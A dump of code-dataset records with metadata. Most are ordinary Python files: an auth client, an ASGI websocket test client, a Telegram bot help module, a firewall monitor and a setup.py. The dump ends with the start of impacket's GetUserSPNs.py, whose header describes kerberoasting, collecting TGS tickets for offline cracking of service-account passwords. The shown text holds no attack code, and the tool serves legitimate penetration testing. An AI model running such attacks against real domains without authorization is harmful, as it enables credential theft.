        response = self.auth_session.post(url, json=data)
        if response.status_code != 200:
            self.auth_retries += 1
            if self.auth_retries > auth_endpoint_constants['MAX_RSA_RETRY']:
                raise MaxRetryException('bot failed to authenticate more than 5 times.')
            else:
                logging.debug('RSA_auth/get_session_token() function failed: {}'.format(
                    response.status_code)
                )
                time.sleep(auth_endpoint_constants['TIMEOUT'])
                self.session_authenticate()
        else:
            data = json.loads(response.text)
            logging.debug('RSA/session token success')
            self.session_token = data['token']
            self.auth_retries = 0

    def key_manager_authenticate(self):
        """POST a JWT to the key manager to obtain its token.

        Same retry behaviour as session_authenticate().
        """
        logging.debug('RSA_auth/get_keyauth()')
        data = {
            'token': self.create_jwt()
        }
        url = self.config.data['keyAuthHost']+'/relay/pubkey/authenticate'
        response = self.key_manager_auth_session.post(url, json=data)
        if response.status_code != 200:
            self.auth_retries += 1
            if self.auth_retries > auth_endpoint_constants['MAX_RSA_RETRY']:
                raise MaxRetryException('bot failed to authenticate more than 5 times.')
            else:
                logging.debug('RSA_auth/get_key_manager_authenticate() function failed: {}'.format(
                    response.status_code)
                )
                time.sleep(auth_endpoint_constants['TIMEOUT'])
                self.key_manager_authenticate()
        else:
            data = json.loads(response.text)
            logging.debug('RSA/key manager token success')
            self.key_manager_token = data['token']
            self.auth_retries = 0
| true | true |
f7237489e702998835d1d11785ff1e504bcdfd13 | 4,104 | py | Python | async_asgi_testclient/websocket.py | kleschenko/async-asgi-testclient | f3243ea332b0a91f3990676aa850fdf68676ae93 | [
"MIT"
] | null | null | null | async_asgi_testclient/websocket.py | kleschenko/async-asgi-testclient | f3243ea332b0a91f3990676aa850fdf68676ae93 | [
"MIT"
] | null | null | null | async_asgi_testclient/websocket.py | kleschenko/async-asgi-testclient | f3243ea332b0a91f3990676aa850fdf68676ae93 | [
"MIT"
] | null | null | null | from async_asgi_testclient.utils import create_monitored_task
from async_asgi_testclient.utils import flatten_headers
from async_asgi_testclient.utils import make_test_headers_path_and_query_string
from async_asgi_testclient.utils import Message
from async_asgi_testclient.utils import receive
from http.cookies import SimpleCookie
from typing import Dict
from typing import Optional
import asyncio
import json
class WebSocketSession:
    """Drive an ASGI websocket application from a test client.

    Client->app messages are placed on ``input_queue``; app->client
    messages are consumed from ``output_queue``.
    """

    def __init__(
        self,
        testclient,
        path,
        headers: Optional[Dict] = None,
        cookies: Optional[Dict] = None,
    ):
        self.testclient = testclient
        self.path = path
        self.headers = headers or {}
        self.cookies = cookies
        self.input_queue: asyncio.Queue[dict] = asyncio.Queue()
        self.output_queue: asyncio.Queue[dict] = asyncio.Queue()

    async def __aenter__(self):
        # Async context manager: handshake on enter, disconnect on exit.
        await self.connect()
        return self

    async def __aexit__(self, exc_type, exc, tb):
        await self.close()

    async def close(self, code: int = 1000):
        """Tell the application the client disconnected."""
        await self._send({"type": "websocket.disconnect", "code": code})

    async def send_str(self, data: str) -> None:
        """Alias of :meth:`send_text`."""
        await self.send_text(data)

    async def send_text(self, data: str) -> None:
        await self._send({"type": "websocket.receive", "text": data})

    async def send_bytes(self, data: bytes) -> None:
        await self._send({"type": "websocket.receive", "bytes": data})

    async def send_json(self, data, mode: str = "text") -> None:
        """Serialize ``data`` as JSON and send it as text or utf-8 bytes."""
        assert mode in ["text", "binary"]
        text = json.dumps(data)
        payload = (
            {"type": "websocket.receive", "text": text}
            if mode == "text"
            else {"type": "websocket.receive", "bytes": text.encode("utf-8")}
        )
        await self._send(payload)

    async def _send(self, data):
        self.input_queue.put_nowait(data)

    async def receive_text(self) -> str:
        msg = await self._receive()
        if msg["type"] != "websocket.send":
            raise Exception(msg)
        return msg["text"]

    async def receive_bytes(self) -> bytes:
        msg = await self._receive()
        if msg["type"] != "websocket.send":
            raise Exception(msg)
        return msg["bytes"]

    async def receive_json(self):
        msg = await self._receive()
        if msg["type"] != "websocket.send":
            raise Exception(msg)
        if "text" in msg:
            raw = msg["text"]
        elif "bytes" in msg:
            raw = msg["bytes"]
        else:
            raise Exception(msg)
        return json.loads(raw)

    async def _receive(self):
        return await receive(self.output_queue)

    def __aiter__(self):
        return self

    async def __anext__(self):
        msg = await self._receive()
        # A Message(event="exit") sentinel from the monitored app task
        # terminates async iteration.
        if isinstance(msg, Message) and msg.event == "exit":
            raise StopAsyncIteration(msg)
        return msg

    async def connect(self):
        """Open the websocket: build the ASGI scope, start the app task,
        send ``websocket.connect`` and expect ``websocket.accept``."""
        tc = self.testclient
        app = tc.application
        headers, path, query_string_bytes = make_test_headers_path_and_query_string(
            app, self.path, self.headers
        )
        cookie_jar = tc.cookie_jar if self.cookies is None else SimpleCookie(self.cookies)
        if cookie_jar and cookie_jar.output(header=""):
            headers.add("Cookie", cookie_jar.output(header=""))
        scope = {
            "type": "websocket",
            "headers": flatten_headers(headers),
            "path": path,
            "query_string": query_string_bytes,
            "root_path": "",
            "scheme": "http",
            "subprotocols": [],
        }
        create_monitored_task(
            app(scope, self.input_queue.get, self.output_queue.put),
            self.output_queue.put_nowait,
        )
        await self._send({"type": "websocket.connect"})
        msg = await self._receive()
        assert msg["type"] == "websocket.accept"
| 31.328244 | 84 | 0.602827 | from async_asgi_testclient.utils import create_monitored_task
from async_asgi_testclient.utils import flatten_headers
from async_asgi_testclient.utils import make_test_headers_path_and_query_string
from async_asgi_testclient.utils import Message
from async_asgi_testclient.utils import receive
from http.cookies import SimpleCookie
from typing import Dict
from typing import Optional
import asyncio
import json
class WebSocketSession:
    """Websocket session for driving an ASGI app from the test client.

    Client->app messages go onto ``input_queue``; app->client messages
    are read from ``output_queue``.
    """

    def __init__(
        self,
        testclient,
        path,
        headers: Optional[Dict] = None,
        cookies: Optional[Dict] = None,
    ):
        self.testclient = testclient
        self.path = path
        self.headers = headers or {}
        self.cookies = cookies
        self.input_queue: asyncio.Queue[dict] = asyncio.Queue()
        self.output_queue: asyncio.Queue[dict] = asyncio.Queue()

    async def __aenter__(self):
        # Async context manager: connect on enter, disconnect on exit.
        await self.connect()
        return self

    async def __aexit__(self, exc_type, exc, tb):
        await self.close()

    async def close(self, code: int = 1000):
        # Tell the application the client disconnected.
        await self._send({"type": "websocket.disconnect", "code": code})

    async def send_str(self, data: str) -> None:
        # Alias for send_text().
        await self.send_text(data)

    async def send_text(self, data: str) -> None:
        await self._send({"type": "websocket.receive", "text": data})

    async def send_bytes(self, data: bytes) -> None:
        await self._send({"type": "websocket.receive", "bytes": data})

    async def send_json(self, data, mode: str = "text") -> None:
        # Serialize `data` and deliver it as text or utf-8 bytes.
        assert mode in ["text", "binary"]
        text = json.dumps(data)
        if mode == "text":
            await self._send({"type": "websocket.receive", "text": text})
        else:
            await self._send(
                {"type": "websocket.receive", "bytes": text.encode("utf-8")}
            )

    async def _send(self, data):
        self.input_queue.put_nowait(data)

    async def receive_text(self) -> str:
        message = await self._receive()
        if message["type"] != "websocket.send":
            raise Exception(message)
        return message["text"]

    async def receive_bytes(self) -> bytes:
        message = await self._receive()
        if message["type"] != "websocket.send":
            raise Exception(message)
        return message["bytes"]

    async def receive_json(self):
        message = await self._receive()
        if message["type"] != "websocket.send":
            raise Exception(message)
        if "text" in message:
            data = message["text"]
        elif "bytes" in message:
            data = message["bytes"]
        else:
            raise Exception(message)
        return json.loads(data)

    async def _receive(self):
        return await receive(self.output_queue)

    def __aiter__(self):
        return self

    async def __anext__(self):
        msg = await self._receive()
        if isinstance(msg, Message):
            if msg.event == "exit":
                # Sentinel from the monitored app task: end iteration.
                raise StopAsyncIteration(msg)
        return msg

    async def connect(self):
        # Build the ASGI websocket scope, start the app task, then do
        # the connect/accept handshake.
        tc = self.testclient
        app = tc.application
        headers, path, query_string_bytes = make_test_headers_path_and_query_string(
            app, self.path, self.headers
        )
        if self.cookies is None:  # use TestClient.cookie_jar
            cookie_jar = tc.cookie_jar
        else:
            cookie_jar = SimpleCookie(self.cookies)
        if cookie_jar and cookie_jar.output(header=""):
            headers.add("Cookie", cookie_jar.output(header=""))
        scope = {
            "type": "websocket",
            "headers": flatten_headers(headers),
            "path": path,
            "query_string": query_string_bytes,
            "root_path": "",
            "scheme": "http",
            "subprotocols": [],
        }
        create_monitored_task(
            app(scope, self.input_queue.get, self.output_queue.put),
            self.output_queue.put_nowait,
        )
        await self._send({"type": "websocket.connect"})
        msg = await self._receive()
        assert msg["type"] == "websocket.accept"
| true | true |
f7237499d6ef6b66f57eb9b6519906e628dd61dc | 2,892 | py | Python | Brain/Modules/help.py | AdityaTelange/Python-Telegram-Bot-SAMPLE-STRUCTURE- | cb166bd3bae5b27d404eecc272e2b41aa929738f | [
"MIT"
] | 6 | 2020-09-06T16:24:02.000Z | 2022-02-14T13:11:27.000Z | Brain/Modules/help.py | AdityaTelange/Python-Telegram-Bot-SAMPLE-STRUCTURE- | cb166bd3bae5b27d404eecc272e2b41aa929738f | [
"MIT"
] | null | null | null | Brain/Modules/help.py | AdityaTelange/Python-Telegram-Bot-SAMPLE-STRUCTURE- | cb166bd3bae5b27d404eecc272e2b41aa929738f | [
"MIT"
] | 1 | 2019-07-01T23:40:35.000Z | 2019-07-01T23:40:35.000Z | import re
from telegram import ParseMode, InlineKeyboardMarkup, InlineKeyboardButton
from telegram.chataction import ChatAction
from telegram.error import BadRequest
from telegram.ext.dispatcher import run_async
from Brain import Utils
from Brain.Modules.strings import logger, HELPER_SCRIPTS, HELP_STRINGS
@run_async
def help_button(update, context):
    """Dispatch inline-keyboard callbacks coming from the help menu."""
    query = update.callback_query
    action_match = re.match(r"help_action=(.+?)", query.data)
    back_match = re.match(r"help_back", query.data)
    try:
        if action_match:
            # "help_action=<module>" -> show that module's help page.
            module_text = query.data.split('=', 1)[1]
            context.args = module_text.split(' ')  # update context.args
            get_help(update, context)
        elif back_match:
            # "help_back" -> back to the top-level help menu.
            context.args = []
            get_help(update, context)
        # Answer the callback so the client stops the loading spinner,
        # then remove the old help message.
        context.bot.answer_callback_query(query.id)
        query.message.delete()
    except BadRequest as e:
        # These Telegram errors are routine and intentionally ignored.
        if e.message not in ("Message is not modified",
                             "Query_id_invalid",
                             "Message can't be deleted"):
            logger.exception("Exception in help buttons. %s", str(query.data))
# do not async
def send_help(update, text, keyboard=None):
    """Reply to the effective message with Markdown-formatted help text.

    BUG FIX: removed the dead `if not keyboard: pass` no-op branch.

    Args:
        update: Telegram update to reply to.
        text: Markdown help text.
        keyboard: Optional InlineKeyboardMarkup; None sends no keyboard.
    """
    logger.info("into send_help")
    update.effective_message.reply_text(text=text, parse_mode=ParseMode.MARKDOWN, reply_markup=keyboard)
@run_async
def get_help(update, context):
    """Send the help menu, or one module's help, only in a private chat."""
    logger.info("into get_help")
    chat = update.effective_chat
    context.bot.send_chat_action(chat_id=chat.id, action=ChatAction.TYPING)
    # ONLY send help in PM
    if chat.type != chat.PRIVATE:
        # In a group: point the user at the bot's PM instead.
        pm_keyboard = InlineKeyboardMarkup(
            [[InlineKeyboardButton(text="Help",
                                   url="t.me/{}?start=help".format(
                                       context.bot.username))]])
        send_help(update, "Contact me in PM to get the list of possible commands.", pm_keyboard)
        return
    if len(context.args) >= 1 and any(context.args[0].lower() == x for x in HELPER_SCRIPTS):
        # "/help <module>": show that module's help with a Back button.
        module = context.args[0].lower()
        text = "Here is the available help for the *{}* module:\n".format(module) \
            + HELPER_SCRIPTS[module]
        back_markup = InlineKeyboardMarkup([[InlineKeyboardButton(text="Back", callback_data="help_back")]])
        send_help(update, text, back_markup)
        return
    # No argument: build a two-column keyboard of all help modules.
    buttons = [
        InlineKeyboardButton(text="/{}".format(module),
                             callback_data="help_action={}".format(module))
        for module in HELPER_SCRIPTS
    ]
    send_help(
        update=update,
        text=HELP_STRINGS,
        keyboard=InlineKeyboardMarkup(Utils.build_menu(buttons, n_cols=2))
    )
) | 35.703704 | 119 | 0.63278 | import re
from telegram import ParseMode, InlineKeyboardMarkup, InlineKeyboardButton
from telegram.chataction import ChatAction
from telegram.error import BadRequest
from telegram.ext.dispatcher import run_async
from Brain import Utils
from Brain.Modules.strings import logger, HELPER_SCRIPTS, HELP_STRINGS
@run_async
def help_button(update, context):
    # Handle inline-keyboard callbacks from the help menu.
    query = update.callback_query
    suggestion_match = re.match(r"help_action=(.+?)", query.data)
    back_button = re.match(r"help_back", query.data)
    try:
        if suggestion_match:
            # "help_action=<module>": show that module's help page.
            text = query.data.split('=', 1)[1]
            context.args = text.split(' ')
            get_help(update, context)
        elif back_button:
            # "help_back": back to the top-level help menu.
            context.args = []
            get_help(update, context)
        # Answer the callback so the client stops the loading spinner.
        context.bot.answer_callback_query(query.id)
        query.message.delete()
    except BadRequest as e:
        # These Telegram errors are expected and intentionally ignored.
        if e.message == "Message is not modified":
            pass
        elif e.message == "Query_id_invalid":
            pass
        elif e.message == "Message can't be deleted":
            pass
        else:
            logger.exception("Exception in help buttons. %s", str(query.data))
# do not async
def send_help(update, text, keyboard=None):
    # Reply with Markdown help text and an optional inline keyboard.
    logger.info("into send_help")
    if not keyboard:
        pass  # NOTE(review): dead branch -- has no effect
    update.effective_message.reply_text(text=text, parse_mode=ParseMode.MARKDOWN, reply_markup=keyboard)
@run_async
def get_help(update, context):
    # Entry point for /help: full menu in PM, redirect button in groups.
    logger.info("into get_help")
    chat = update.effective_chat
    context.bot.send_chat_action(chat_id=chat.id, action=ChatAction.TYPING)
    # ONLY send help in PM
    if chat.type != chat.PRIVATE:
        # In a group chat: point the user to the bot's PM instead.
        send_help(update, "Contact me in PM to get the list of possible commands.", InlineKeyboardMarkup(
            [[InlineKeyboardButton(text="Help",
                                   url="t.me/{}?start=help".format(
                                       context.bot.username))]]))
        return
    elif len(context.args) >= 1 and any(context.args[0].lower() == x for x in HELPER_SCRIPTS):
        # "/help <module>": show that module's help with a Back button.
        module = context.args[0].lower()
        text = "Here is the available help for the *{}* module:\n".format(module) \
            + HELPER_SCRIPTS[module]
        send_help(update, text, InlineKeyboardMarkup([[InlineKeyboardButton(text="Back", callback_data="help_back")]]))
    else:
        # No argument: build a two-column keyboard of all help modules.
        button_list = []
        for module in HELPER_SCRIPTS:
            button_list.append(
                InlineKeyboardButton(text="/{}".format(module),
                                     callback_data="help_action={}".format(module), ))
        reply_markup_keyboard = InlineKeyboardMarkup(Utils.build_menu(button_list, n_cols=2))
        send_help(
            update=update,
            text=HELP_STRINGS,
            keyboard=reply_markup_keyboard
        )
) | true | true |
f72374ee2fd64cbf7283cb678c83b8d8d0188e8c | 5,714 | py | Python | iemlav/lib/firewall/firewall_monitor.py | GouravRDutta/IemLabsAV | 8d397a3d59e067176269c5e84d73bf53951b7b3f | [
"MIT"
] | null | null | null | iemlav/lib/firewall/firewall_monitor.py | GouravRDutta/IemLabsAV | 8d397a3d59e067176269c5e84d73bf53951b7b3f | [
"MIT"
] | null | null | null | iemlav/lib/firewall/firewall_monitor.py | GouravRDutta/IemLabsAV | 8d397a3d59e067176269c5e84d73bf53951b7b3f | [
"MIT"
] | 1 | 2021-07-02T12:29:10.000Z | 2021-07-02T12:29:10.000Z | # -*- coding: utf-8 -*-
import re
import socket
import psutil
import time
from iemlav import logger
from iemlav.lib.firewall import utils
class FirewallMonitor(object):
"""Class for FirewallMonitor."""
module_name = "FirewallMonitor"
    def __init__(self, interface=None, debug=False):
        """Initialize FirewallMonitor.

        Args:
            interface: Network interface name to monitor (psutil key).
            debug: Forwarded to the IemlAV logger.
        """
        self.logger = logger.IemlAVLogger(
            self.module_name,
            debug
        )
        # Seconds to sleep between monitoring passes
        self._SLEEP = 5
        self.interface = interface
        # NOTE(review): gethostbyname(gethostname()) may resolve to
        # 127.0.x.x depending on /etc/hosts -- confirm intended IP.
        self.machine_ip = socket.gethostbyname(socket.gethostname())
        self.open_ports = []
        # Cumulative byte counters for the selected interface
        self.network_data = {
            'bytes_sent': 0,
            'bytes_recv': 0
        }
        self.process_list = []
        self.services_list = []
def check_services(self):
"""
Scan for active services.
Args:
None
Returns:
None
Raises:
None
"""
result, error = utils.excecute_command('service --status-all')
if error:
self.logger.log(
"Scanning for servcies failed: " + str(error),
logtype="error"
)
if result:
services = re.findall(r'\[\s\+\s\]\s*([a-zA-Z0-9\-\_]*)',
result)
for service in services:
if service not in self.services_list:
self.services_list.append(service)
self.logger.log(
"Services: " + str(', '.join(self.services_list)),
logtype="info"
)
def check_open_ports(self):
"""
Scan for open ports and add to the open
port list.
Args:
None
Returns:
None
Raises:
None
"""
result, error = utils.excecute_command('netstat -anp')
if error:
self.logger.log(
"Scanning for open ports failed: " + str(error),
logtype="error"
)
if result:
open_ports = re.findall(r'(LISTENING|CONNECTED)\s+(\d+)(\s.*)',
result)
for port in open_ports:
if port[1] not in self.open_ports:
self.open_ports.append(port[1])
self.logger.log(
"Open ports: " + str(', '.join(self.open_ports)),
logtype="info"
)
def network_usage(self):
"""
Calculate the total bytes sent and received
over the selected interface.
Args:
None
Returns:
None
Raises:
None
"""
result = str(psutil.net_io_counters(pernic=True))
pattern = str(self.interface) + "':\s*snetio\(bytes_sent=(\d*),\s*bytes_recv=(\d*)"
network_data = re.findall(pattern,result)[0]
bytes_sent = int(network_data[0])
bytes_recv = int(network_data[1])
if self.network_data['bytes_sent'] != bytes_sent:
self.network_data['bytes_sent'] = bytes_sent
if self.network_data['bytes_recv'] != bytes_recv:
self.network_data['bytes_recv'] = bytes_recv
self.logger.log(
"Bytes sent: " + str(self.network_data['bytes_sent']),
logtype="info"
)
self.logger.log(
"Bytes received: " + str(self.network_data['bytes_recv']),
logtype="info"
)
def check_process(self):
"""
Check the currently running process.
Args:
None
Returns:
None
Raises:
None
"""
output, error = utils.excecute_command('ps -ef')
if error:
self.logger.log(
"Scanning for active process failed: " + str(error),
logtype="error"
)
if output:
process_details = re.findall(r'(\d{2}:\d{2})\s*?.*((\[|/)[a-zA-Z0-9\-/\]:_]*)',
output)
for process in process_details:
temp_dict = {process[0]: process[1].strip('/[]')}
self.process_list.append(temp_dict)
self.logger.log(
"Active process: " + str(self.process_list),
logtype="info"
)
def startMonitoring(self):
"""
Start firewall monitoring.
Args:
None
Returns:
None
Raises:
None
"""
current_time, error = utils.excecute_command('date')
if error:
self.logger.log(
"Time error: " + str(error),
logtype="error"
)
if current_time:
self.logger.log(
"Time: " + str(current_time),
logtype="info"
)
os_details, error = utils.excecute_command('uname -a')
if error:
self.logger.log(
"OS Detail error: " + str(error),
logtype="error"
)
if os_details:
self.logger.log(
"OS Details: " + str(os_details),
logtype="info"
)
while True:
# Wait for the required sleep seconds
time.sleep(self._SLEEP)
# Monitor process
self.check_process()
# Monitor network usage
self.network_usage()
# Monitor open ports
self.check_open_ports()
# Monitor running services
self.check_services()
| 24.951965 | 91 | 0.476724 |
import re
import socket
import psutil
import time
from iemlav import logger
from iemlav.lib.firewall import utils
class FirewallMonitor(object):
    """Periodically log firewall-related host activity.

    Each sweep collects and logs: running services
    (``service --status-all``), open ports (``netstat -anp``), byte
    counters for the configured interface (psutil), and active
    processes (``ps -ef``).
    """

    # Name reported to the project logger.
    module_name = "FirewallMonitor"

    def __init__(self, interface=None, debug=False):
        """Set up the logger and monitoring state.

        Args:
            interface (str): Network interface to watch, as named in
                psutil's per-NIC counters.
            debug (bool): Enable debug logging.
        """
        self.logger = logger.IemlAVLogger(
            self.module_name,
            debug
        )
        # Seconds to pause between monitoring sweeps.
        self._SLEEP = 5
        self.interface = interface
        self.machine_ip = socket.gethostbyname(socket.gethostname())
        # Distinct port numbers observed in LISTENING / CONNECTED state.
        self.open_ports = []
        # Last observed interface byte counters.
        self.network_data = {
            'bytes_sent': 0,
            'bytes_recv': 0
        }
        # One {start_time: command} entry per observed process.
        self.process_list = []
        # Names of services reported as running ("[ + ]").
        self.services_list = []

    def check_services(self):
        """Record services marked running in ``service --status-all``."""
        result, error = utils.excecute_command('service --status-all')
        if error:
            self.logger.log(
                "Scanning for servcies failed: " + str(error),
                logtype="error"
            )
        if result:
            services = re.findall(r'\[\s\+\s\]\s*([a-zA-Z0-9\-\_]*)',
                                  result)
            for service in services:
                if service not in self.services_list:
                    self.services_list.append(service)
            self.logger.log(
                "Services: " + str(', '.join(self.services_list)),
                logtype="info"
            )

    def check_open_ports(self):
        """Record ports seen LISTENING/CONNECTED in ``netstat -anp``."""
        result, error = utils.excecute_command('netstat -anp')
        if error:
            self.logger.log(
                "Scanning for open ports failed: " + str(error),
                logtype="error"
            )
        if result:
            open_ports = re.findall(r'(LISTENING|CONNECTED)\s+(\d+)(\s.*)',
                                    result)
            for port in open_ports:
                if port[1] not in self.open_ports:
                    self.open_ports.append(port[1])
            self.logger.log(
                "Open ports: " + str(', '.join(self.open_ports)),
                logtype="info"
            )

    def network_usage(self):
        """Log total bytes sent/received on the selected interface.

        If the interface is missing from the psutil counters the problem
        is logged and the sweep is skipped (the previous implementation
        raised IndexError here).
        """
        result = str(psutil.net_io_counters(pernic=True))
        # Raw string: the previous non-raw literal relied on invalid escape
        # sequences (\s, \(, \d).  The interface name is escaped so regex
        # metacharacters cannot break the match.
        pattern = (re.escape(str(self.interface)) +
                   r"':\s*snetio\(bytes_sent=(\d*),\s*bytes_recv=(\d*)")
        matches = re.findall(pattern, result)
        if not matches:
            self.logger.log(
                "Interface not found: " + str(self.interface),
                logtype="error"
            )
            return
        bytes_sent = int(matches[0][0])
        bytes_recv = int(matches[0][1])
        if self.network_data['bytes_sent'] != bytes_sent:
            self.network_data['bytes_sent'] = bytes_sent
        if self.network_data['bytes_recv'] != bytes_recv:
            self.network_data['bytes_recv'] = bytes_recv
        self.logger.log(
            "Bytes sent: " + str(self.network_data['bytes_sent']),
            logtype="info"
        )
        self.logger.log(
            "Bytes received: " + str(self.network_data['bytes_recv']),
            logtype="info"
        )

    def check_process(self):
        """Record running processes from ``ps -ef`` as {time: command}."""
        output, error = utils.excecute_command('ps -ef')
        if error:
            self.logger.log(
                "Scanning for active process failed: " + str(error),
                logtype="error"
            )
        if output:
            process_details = re.findall(r'(\d{2}:\d{2})\s*?.*((\[|/)[a-zA-Z0-9\-/\]:_]*)',
                                         output)
            for process in process_details:
                temp_dict = {process[0]: process[1].strip('/[]')}
                self.process_list.append(temp_dict)
            self.logger.log(
                "Active process: " + str(self.process_list),
                logtype="info"
            )

    def startMonitoring(self):
        """Log time / OS details once, then sweep forever.

        Runs one full monitoring sweep every ``_SLEEP`` seconds.  Never
        returns.
        """
        current_time, error = utils.excecute_command('date')
        if error:
            self.logger.log(
                "Time error: " + str(error),
                logtype="error"
            )
        if current_time:
            self.logger.log(
                "Time: " + str(current_time),
                logtype="info"
            )
        os_details, error = utils.excecute_command('uname -a')
        if error:
            self.logger.log(
                "OS Detail error: " + str(error),
                logtype="error"
            )
        if os_details:
            self.logger.log(
                "OS Details: " + str(os_details),
                logtype="info"
            )
        while True:
            # Wait for the required sleep seconds
            time.sleep(self._SLEEP)
            # Monitor process
            self.check_process()
            # Monitor network usage
            self.network_usage()
            # Monitor open ports
            self.check_open_ports()
            # Monitor running services
            self.check_services()
| true | true |
f723750f99457e168389453ca5bf016fae7541b3 | 2,300 | py | Python | setup.py | bottoy/requests_auth | f95ecd833d52341ebe0e2c974d133577ae124dd9 | [
"MIT"
] | 1 | 2020-04-02T02:29:56.000Z | 2020-04-02T02:29:56.000Z | setup.py | bottoy/requests_auth | f95ecd833d52341ebe0e2c974d133577ae124dd9 | [
"MIT"
] | null | null | null | setup.py | bottoy/requests_auth | f95ecd833d52341ebe0e2c974d133577ae124dd9 | [
"MIT"
] | null | null | null | import os
from setuptools import setup, find_packages
this_dir = os.path.abspath(os.path.dirname(__file__))

# The PyPI long description is taken verbatim from the README.
with open(os.path.join(this_dir, "README.md"), "r") as f:
    long_description = f.read()

# Extract the version string from the last line of requests_auth/version.py.
# A context manager is used so the file handle is closed deterministically
# (the previous inline open() inside the setup() call leaked the handle).
with open("requests_auth/version.py") as version_file:
    version = version_file.readlines()[-1].split()[-1].strip("\"'")

# More information on properties: https://packaging.python.org/distributing
setup(
    name="requests_auth",
    version=version,
    author="Colin Bounouar",
    author_email="colin.bounouar.dev@gmail.com",
    maintainer="Colin Bounouar",
    maintainer_email="colin.bounouar.dev@gmail.com",
    url="https://colin-b.github.io/requests_auth/",
    description="Authentication for Requests",
    long_description=long_description,
    long_description_content_type="text/markdown",
    download_url="https://pypi.org/project/requests-auth/",
    license="MIT",
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: MIT License",
        "Natural Language :: English",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Topic :: Software Development :: Build Tools",
    ],
    keywords=[
        "authentication",
        "ntlm",
        "oauth2",
        "azure-active-directory",
        "azure-ad",
        "okta",
        "apikey",
        "multiple",
    ],
    packages=find_packages(exclude=["tests*"]),
    install_requires=[
        # Used for Base Authentication and to communicate with OAuth2 servers
        "requests==2.*"
    ],
    extras_require={
        "testing": [
            # Used to generate test tokens
            "pyjwt==1.*",
            # Used to mock responses to requests
            "pytest-responses==0.4.*",
            # Used to check coverage
            "pytest-cov==2.*",
        ]
    },
    python_requires=">=3.6",
    project_urls={
        "GitHub": "https://github.com/Colin-b/requests_auth",
        "Changelog": "https://github.com/Colin-b/requests_auth/blob/master/CHANGELOG.md",
        "Issues": "https://github.com/Colin-b/requests_auth/issues",
    },
    platforms=["Windows", "Linux"],
)
| 34.328358 | 89 | 0.61 | import os
from setuptools import setup, find_packages
this_dir = os.path.abspath(os.path.dirname(__file__))

# PyPI long description comes straight from the README.
with open(os.path.join(this_dir, "README.md"), "r") as f:
    long_description = f.read()

# Read the version from the last line of requests_auth/version.py inside a
# context manager so the handle is closed (the previous inline open()
# inside the setup() call leaked it).
with open("requests_auth/version.py") as version_file:
    version = version_file.readlines()[-1].split()[-1].strip("\"'")

setup(
    name="requests_auth",
    version=version,
    author="Colin Bounouar",
    author_email="colin.bounouar.dev@gmail.com",
    maintainer="Colin Bounouar",
    maintainer_email="colin.bounouar.dev@gmail.com",
    url="https://colin-b.github.io/requests_auth/",
    description="Authentication for Requests",
    long_description=long_description,
    long_description_content_type="text/markdown",
    download_url="https://pypi.org/project/requests-auth/",
    license="MIT",
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: MIT License",
        "Natural Language :: English",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Topic :: Software Development :: Build Tools",
    ],
    keywords=[
        "authentication",
        "ntlm",
        "oauth2",
        "azure-active-directory",
        "azure-ad",
        "okta",
        "apikey",
        "multiple",
    ],
    packages=find_packages(exclude=["tests*"]),
    install_requires=[
        # Used for Base Authentication and to communicate with OAuth2 servers
        "requests==2.*"
    ],
    extras_require={
        "testing": [
            # Used to generate test tokens
            "pyjwt==1.*",
            # Used to mock responses to requests
            "pytest-responses==0.4.*",
            # Used to check coverage
            "pytest-cov==2.*",
        ]
    },
    python_requires=">=3.6",
    project_urls={
        "GitHub": "https://github.com/Colin-b/requests_auth",
        "Changelog": "https://github.com/Colin-b/requests_auth/blob/master/CHANGELOG.md",
        "Issues": "https://github.com/Colin-b/requests_auth/issues",
    },
    platforms=["Windows", "Linux"],
)
| true | true |
f723757147c0b88be1037f2756655a023f28d617 | 20,134 | py | Python | examples/GetUserSPNs.py | grkoll/impacket | 90a91045139659d83409af1771dcaf697c00de99 | [
"Apache-1.1"
] | null | null | null | examples/GetUserSPNs.py | grkoll/impacket | 90a91045139659d83409af1771dcaf697c00de99 | [
"Apache-1.1"
] | null | null | null | examples/GetUserSPNs.py | grkoll/impacket | 90a91045139659d83409af1771dcaf697c00de99 | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module will try to find Service Principal Names that are associated with normal user account.
# Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request
# will encrypt the ticket with the account the SPN is running under, this could be used for an offline
# bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
# This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at
# https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
#
# Original idea of implementing this in Python belongs to @skelsec and his
# https://github.com/skelsec/PyKerberoast project
#
# This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.
# Also, disabled accounts won't be shown.
#
# ToDo:
# [X] Add the capability for requesting TGS and output them in JtR/hashcat format
# [ ] Improve the search filter, we have to specify we don't want machine accounts in the answer
# (play with userAccountControl)
#
import argparse
import logging
import os
import sys
from datetime import datetime
from binascii import hexlify, unhexlify
from pyasn1.codec.der import decoder
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_NORMAL_ACCOUNT
from impacket.examples import logger
from impacket.krb5 import constants
from impacket.krb5.asn1 import TGS_REP
from impacket.krb5.ccache import CCache
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5.types import Principal
from impacket.ldap import ldap, ldapasn1
from impacket.smbconnection import SMBConnection
class GetUserSPNs:
    """Query a domain over LDAP for SPNs tied to enabled user (non-machine)
    accounts and, optionally, request their TGS tickets and print them in
    JtR/hashcat $krb5tgs$ format (kerberoast)."""
    @staticmethod
    def printTable(items, header):
        """Pretty-print `items` (list of rows) under `header`, sizing each
        column to its widest cell."""
        colLen = []
        for i, col in enumerate(header):
